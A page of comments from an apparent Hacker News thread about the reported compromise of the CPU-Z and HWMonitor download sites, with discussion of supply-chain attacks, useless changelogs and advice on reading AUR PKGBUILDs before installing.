CPU-Z and HWMonitor compromised

Posted by pashadee 8 hours ago

169 points | 73 commentspage 2

kevincloudsec 7 hours ago|

same threat group hit filezilla last month. they're specifically targeting utilities that tech-savvy users trust and download from official sources. the attack surface is the the api layer that generates download links, not the binary itself

moomoo11 2 hours ago||

One interesting thing about all this stuff is that we may see a big swing towards paid/trusted solutions for all these type of things.

Maybe the 5-10% of true nerds will go find the l33t open source solutions, but most people will just use some paid solution.

Maybe Steam could build. Or in Windows. Or some SaaS solution for registry.

In exchange you just share your HW info

cachius 6 hours ago||

Grok post linking further sources: https://x.com/i/grok/share/3b870ceb9b424c01bf89afbe0de3bd81

BoredPositron 5 hours ago||

"Bug fixes and general improvements."

Supply chain attacks are easier because changelogs for most software are useless now if they are provided at all.

unethical_ban 6 hours ago||

I've wondered about this while using CachyOS and their package installer. I don't know what repos do what, I don't really understand the security model of the AUR, and I wonder, if I download a package, how can I know it's legitimate or otherwise by some trusted user of the community vs. some random person?

cephi 6 hours ago|

To provide some quick information (I implore others to correct me here):

- CachyOS packages should be coming from known, trusted CachyOS and Arch Linux maintainers. There is still potential for them or their original packages to get compromised (See XZ backdoor) however they are pulling source code from trusted sources so you can generally trust these as much as your trust the OS itself.

- AUR packages are a complete wild west. AUR packages are defined by PKGBUILD files and I highly recommend learning how to read PKGBUILDs and always reading them before installation and re-reading them when they are updated. PKGBUILDs for AUR packages can be treated as untrusted shell scripts and to a certain extent an arbitrary actor can make and upload any PKGBUILD to the AUR. Feel free to use them, but make sure A) they are downloading from trusted sources like the original git repo and B) they are running commands that are expected.

EDIT: Improved accuracy.

wang_li 7 hours ago||

Jesus. I see that post and comment section and I immediately expect to hear Joey telling me about how this ATM is Idaho started spraying cash after his hack of the Gibson. That is a real-life reproduction of the perception of hackers in films in the '90s.

daneel_w 4 hours ago||

And CSI: Miami, which kept the vibe alive through the 2000s and "educated the masses" on how IT works. Beep boop, I'm in.

vntok 3 hours ago||

The counter-hacker double-keyboarding sequence was inspiring.

vntok 6 hours ago|||

From the thread:

> Q: Why the heck did you hyperlink [the malware installer]?

> A: If someone reads this and they still click the download then they kind of deserve the virus tbh

metalliqaz 6 hours ago||

someone has some l33t sk1llz